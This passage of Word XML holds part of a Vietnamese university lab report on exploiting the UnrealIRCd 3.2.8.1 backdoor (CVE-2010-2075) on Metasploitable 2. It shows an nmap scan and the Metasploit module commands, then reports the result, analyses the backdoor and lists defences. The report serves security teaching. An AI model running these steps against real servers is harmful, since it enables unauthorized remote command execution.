                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Hệ điều hành / IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p w14:paraId="372DEF1C" w14:textId="77777777" w:rsidR="007B6FC0" w:rsidRDefault="00A410FE">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Ghi chú</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B6FC0" w14:paraId="1DD39B2A" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="02BE87F8" w14:textId="77777777" w:rsidR="007B6FC0" w:rsidRDefault="00A410FE">
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Máy tấn công</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6272DE87" w14:textId="56608BE1" w:rsidR="007B6FC0" w:rsidRDefault="00A410FE">
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Kali Linux – </w:t>
            </w:r>
            <w:r w:rsidR="005976CA">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>attack ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6BCFCC0A" w14:textId="77777777" w:rsidR="007B6FC0" w:rsidRDefault="00A410FE">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>LHOST</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B6FC0" w14:paraId="5E7AB07E" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="59F453BA" w14:textId="77777777" w:rsidR="007B6FC0" w:rsidRDefault="00A410FE">
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Máy mục tiêu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0D3CECA0" w14:textId="76019BD6" w:rsidR="007B6FC0" w:rsidRDefault="00A410FE">
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Metasploitable 2 – </w:t>
            </w:r>
            <w:r w:rsidR="005976CA">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>victim ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="754E78BC" w14:textId="77777777" w:rsidR="007B6FC0" w:rsidRDefault="00A410FE">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>RHOSTS (cổng 6667)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="23D1B6B4" w14:textId="77777777" w:rsidR="007B6FC0" w:rsidRDefault="00A410FE">
      <w:pPr>
        <w:spacing w:before="160" w:after="120"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Công cụ chính được sử dụng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5AE491" w14:textId="77777777" w:rsidR="007B6FC0" w:rsidRDefault="00A410FE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Nmap – quét cổng và nhận diện phiên bản dịch vụ IRC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFF6BF7" w14:textId="77777777" w:rsidR="007B6FC0" w:rsidRDefault="00A410FE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:t>Metasploit Framework – module exploit/unix/irc/unreal_ircd_3281_backdoor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDD9BAE" w14:textId="77777777" w:rsidR="007B6FC0" w:rsidRDefault="00A410FE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>Payload: cmd/unix/generic (thực thi lệnh tùy ý trên hệ thống Unix).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09AA177D" w14:textId="77777777" w:rsidR="007B6FC0" w:rsidRDefault="00A410FE">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>4. QUY TRÌNH THỰC NGHIỆM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D53CF81" w14:textId="77777777" w:rsidR="007B6FC0" w:rsidRDefault="00A410FE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.1. Thăm dò (Reconnaissance)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734C716F" w14:textId="77777777" w:rsidR="007B6FC0" w:rsidRDefault="00A410FE">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Sử dụng Nmap để xác nhận cổng dịch vụ IRC (thường là 6667 hoặc 6697) đang mở và kiểm tra phiên bản trên máy mục tiêu:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A8ACE7" w14:textId="0F10E424" w:rsidR="007B6FC0" w:rsidRDefault="00A410FE">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -sV -p 6667 </w:t>
      </w:r>
      <w:r w:rsidR="002C24B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>[victim ip]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FFE043E" w14:textId="77777777" w:rsidR="007B6FC0" w:rsidRDefault="00A410FE">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Kết quả quét giúp xác nhận dịch vụ IRC đang lắng nghe trên cổng 6667 và phiên bản liên quan đến UnrealIRCd, tạo điều kiện cho bước khai thác tiếp theo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF58EB2" w14:textId="77777777" w:rsidR="007B6FC0" w:rsidRDefault="00A410FE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.2. Khai thác bằng Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D702A23" w14:textId="77777777" w:rsidR="007B6FC0" w:rsidRDefault="00A410FE">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Khởi động Metasploit Framework và chọn module khai thác chuyên biệt cho lỗ hổng backdoor này:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330D7B13" w14:textId="77777777" w:rsidR="007B6FC0" w:rsidRDefault="00A410FE">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27375322" w14:textId="77777777" w:rsidR="007B6FC0" w:rsidRDefault="00A410FE">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>use exploit/unix/irc/unreal_ircd_3281_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107D00EB" w14:textId="77777777" w:rsidR="007B6FC0" w:rsidRDefault="00A410FE">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2698E860" w14:textId="77777777" w:rsidR="007B6FC0" w:rsidRDefault="00A410FE">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Cấu hình mục tiêu và payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53177CC5" w14:textId="405F3CB4" w:rsidR="007B6FC0" w:rsidRDefault="00A410FE">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">set RHOSTS </w:t>
      </w:r>
      <w:r w:rsidR="002C24B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>[victim ip]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471A7FDC" w14:textId="77777777" w:rsidR="007B6FC0" w:rsidRDefault="00A410FE">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>set RPORT 6667</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA80325" w14:textId="77777777" w:rsidR="007B6FC0" w:rsidRDefault="00A410FE">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>set PAYLOAD cmd/unix/generic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8D95AE" w14:textId="33657E5A" w:rsidR="007B6FC0" w:rsidRDefault="00A410FE">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">set LHOST </w:t>
      </w:r>
      <w:r w:rsidR="002C24B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>[attack ip]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B41BFD" w14:textId="77777777" w:rsidR="007B6FC0" w:rsidRDefault="00A410FE">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>set LPORT 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A2826A" w14:textId="77777777" w:rsidR="007B6FC0" w:rsidRDefault="00A410FE">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3571FD9E" w14:textId="77777777" w:rsidR="007B6FC0" w:rsidRDefault="00A410FE">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711B5975" w14:textId="77777777" w:rsidR="007B6FC0" w:rsidRDefault="00A410FE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.3. Kết quả thực nghiệm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4143CD26" w14:textId="77777777" w:rsidR="007B6FC0" w:rsidRDefault="00A410FE">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Trong thực nghiệm, module khai thác đã chạy thành công (exploit thành công). Tuy nhiên, phiên lệnh (cmd) trên máy Metasploitable 2 không phản hồi như mong đợi. Tác giả đã thử thay đổi payload/cmd nhưng vẫn gặp tình trạng tương tự. Điều này có thể xuất phát từ cấu hình môi trường lab, phiên bản Metasploit, hoặc trạng thái dịch vụ UnrealIRCd trên máy mục tiêu tại thời điểm thực nghiệm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6121F728" w14:textId="77777777" w:rsidR="007B6FC0" w:rsidRDefault="00A410FE">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>5. PHÂN TÍCH VÀ NHẬN XÉT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1396E4" w14:textId="77777777" w:rsidR="007B6FC0" w:rsidRDefault="00A410FE">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Lỗ hổng CVE-2010-2075 là ví dụ điển hình về backdoor bị chèn vào mã nguồn phần mềm mã nguồn mở thông qua các kênh phân phối (mirror). Khác với nhiều lỗ hổng do lỗi lập trình vô tình, đây là cửa hậu cố ý được đưa vào, cho phép thực thi lệnh từ xa mà không cần xác thực phức tạp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D908F1B" w14:textId="77777777" w:rsidR="007B6FC0" w:rsidRDefault="00A410FE">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Việc module Metasploit báo exploit thành công nhưng shell/cmd không phản hồi là tình huống thường gặp trong lab: có thể do firewall, cấu hình mạng, hoặc dịch vụ IRC không ở trạng thái sẵn sàng nhận payload. Trong môi trường thực tế, khi backdoor còn </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>tồn tại, mức độ nguy hiểm rất cao vì kẻ tấn công có thể chiếm toàn quyền kiểm soát máy chủ IRC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DCED667" w14:textId="77777777" w:rsidR="007B6FC0" w:rsidRDefault="00A410FE">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>6. BIỆN PHÁP PHÒNG THỦ VÀ GIẢM THIỂU</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5303EDDB" w14:textId="77777777" w:rsidR="007B6FC0" w:rsidRDefault="00A410FE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Chỉ tải UnrealIRCd từ nguồn chính thức và kiểm tra checksum (hash) của file phân phối để phát hiện file bị chỉnh sửa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C8CC7D" w14:textId="77777777" w:rsidR="007B6FC0" w:rsidRDefault="00A410FE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Nâng cấp lên phiên bản UnrealIRCd mới hơn, đã loại bỏ backdoor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A59C0C3" w14:textId="77777777" w:rsidR="007B6FC0" w:rsidRDefault="00A410FE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Giám sát log và kết nối bất thường trên cổng IRC (6667/6697).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5044BB27" w14:textId="77777777" w:rsidR="007B6FC0" w:rsidRDefault="00A410FE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Hạn chế truy cập dịch vụ IRC chỉ từ mạng tin cậy; sử dụng tường lửa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77CC977D" w14:textId="77777777" w:rsidR="007B6FC0" w:rsidRDefault="00A410FE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>Thực hiện kiểm thử xâm nhập định kỳ và kiểm tra toàn vẹn mã nguồn phần mềm quan trọng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDC8BD2" w14:textId="77777777" w:rsidR="007B6FC0" w:rsidRDefault="00A410FE">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>7. KẾT LUẬN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DECE967" w14:textId="1EC27135" w:rsidR="007B6FC0" w:rsidRDefault="00A410FE">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Thực nghiệm đã thực hiện đầy đủ các bước thăm dò và khai thác lỗ hổng UnrealIRCd 3.2.8.1 Backdoor (CVE-2010-2075) trên Metasploitable 2. Module Metasploit exploit/unix/irc/unreal_ircd_3281_backdoor được cấu hình với RHOSTS </w:t>
      </w:r>
      <w:r w:rsidR="002C24B3">
        <w:t>[victim ip]</w:t>
      </w:r>
      <w:r>
        <w:t>, RPORT 6667 và payload cmd/unix/generic. Exploit báo thành công, tuy nhiên phiên lệnh trên máy mục tiêu không phản hồi trong môi trường thực nghiệm cụ thể.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C306D6" w14:textId="77777777" w:rsidR="007B6FC0" w:rsidRDefault="00A410FE">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Lỗ hổng này minh họa rõ rủi ro của việc sử dụng phần mềm từ nguồn không tin cậy và tầm quan trọng của việc kiểm tra toàn vẹn mã nguồn. Biện pháp phòng thủ cốt lõi là chỉ sử dụng bản phân phối chính thức, kiểm tra hash, và luôn cập nhật phần mềm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EA014E" w14:textId="77777777" w:rsidR="007B6FC0" w:rsidRDefault="00A410FE">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Báo cáo mang tính chất học thuật và thực nghiệm trong môi trường lab cách ly. Mọi hành vi tấn công hệ thống thật mà không được phép đều là hành vi bất hợp pháp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0440E4B5" w14:textId="77777777" w:rsidR="007B6FC0" w:rsidRDefault="00A410FE">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>TÀI LIỆU THAM KHẢO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48929F49" w14:textId="77777777" w:rsidR="007B6FC0" w:rsidRDefault="00A410FE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>CVE-2010-2075 – National Vulnerability Database (NVD).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF5A1D1" w14:textId="77777777" w:rsidR="007B6FC0" w:rsidRDefault="00A410FE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Metasploit Module – exploit/unix/irc/unreal_ircd_3281_backdoor (Rapid7).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594D90C9" w14:textId="77777777" w:rsidR="007B6FC0" w:rsidRDefault="00A410FE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>UnrealIRCd Official Website và thông báo bảo mật liên quan.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B958066" w14:textId="3109E132" w:rsidR="007B6FC0" w:rsidRDefault="00A410FE" w:rsidP="002E0D2F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>Tài liệu Metasploitable 2 và các bài lab an ninh mạng phổ biến.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="007B6FC0">
      <w:headerReference w:type="default" r:id="rId7"/>
      <w:footerReference w:type="default" r:id="rId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D571D" w14:textId="77777777" w:rsidR="00E77E59" w:rsidRDefault="00E77E59">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0F6224A5" w14:textId="77777777" w:rsidR="00E77E59" w:rsidRDefault="00E77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83E2B" w14:textId="77777777" w:rsidR="007B6FC0" w:rsidRDefault="00A410FE">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4E1C77">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4E1C77">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11132" w14:textId="77777777" w:rsidR="00E77E59" w:rsidRDefault="00E77E59">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="70A49BCD" w14:textId="77777777" w:rsidR="00E77E59" w:rsidRDefault="00E77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A1E35" w14:textId="77777777" w:rsidR="007B6FC0" w:rsidRDefault="00A410FE">
    <w:pPr>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="6" w:space="4" w:color="999999"/>
      </w:pBdr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:i/>
        <w:iCs/>
        <w:color w:val="666666"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:t>Trường Đại học Công nghệ Giao thông Vận tải – Khoa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463B7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="62C80ADC"/>
    <w:lvl w:ilvl="0" w:tplc="F4CCF38C">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="C92672BE">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="4404B348">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="767CE316">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="7AACABEA">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
